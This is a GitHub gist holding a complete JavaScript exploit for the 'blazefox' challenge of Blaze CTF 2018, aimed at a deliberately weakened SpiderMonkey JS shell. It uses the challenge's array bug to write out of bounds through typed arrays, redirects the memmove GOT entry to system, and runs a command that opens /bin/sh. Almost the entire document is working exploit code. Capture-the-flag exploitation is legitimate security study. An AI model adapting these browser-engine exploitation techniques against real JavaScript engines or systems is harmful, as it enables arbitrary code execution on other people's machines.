Created
June 8, 2018 15:01
-
-
Save hama7230/731364b1b50e570a1096db0aab2b0a62 to your computer and use it in GitHub Desktop.
Blaze CTF 2018 blazefox pwn (Note: only js shell)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // https://pastebin.com/gtJA92j8 | |
| function ua2d(x) { | |
| // x: Uint32Array[2] | |
| return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0]; | |
| } | |
| function u2d(x) { | |
| return ua2d([x/0x100000000, x%0x100000000]); | |
| } | |
| var gomi = new Uint8Array([1,2,3,4]); | |
| var a = [2261634.5098039214, 156842099844.5176391602, gomi] | |
| var oob = new Uint8Array([0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41]); | |
| a.blaze() | |
| console.log(a[14]); | |
| // 0000000001e65098 R_X86_64_JUMP_SLOT memmove@GLIBC_2.2.5 | |
| a[13] = u2d(0x1e65098); | |
| console.log(oob); | |
| // system@plt 0x42f8f0 | |
| oob[0] = 0xf0; | |
| oob[1] = 0xf8; | |
| oob[2] = 0x42; | |
| oob[3] = 0x00; | |
| oob[4] = 0x00; | |
| oob[5] = 0x00; | |
| oob[6] = 0x00; | |
| oob[7] = 0x00; | |
| // http://charo-it.hatenablog.jp/entry/2018/05/07/011051 | |
| var target = new Uint8Array(100); | |
| var cmd = "ls -al > hoge; /bin/sh"; | |
| var j; | |
| for(j = 0; j < cmd.length; j++){ | |
| target[j] = cmd.charCodeAt(j); | |
| } | |
| // launch shell | |
| target.copyWithin(0, 1); | |
| // while(true); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment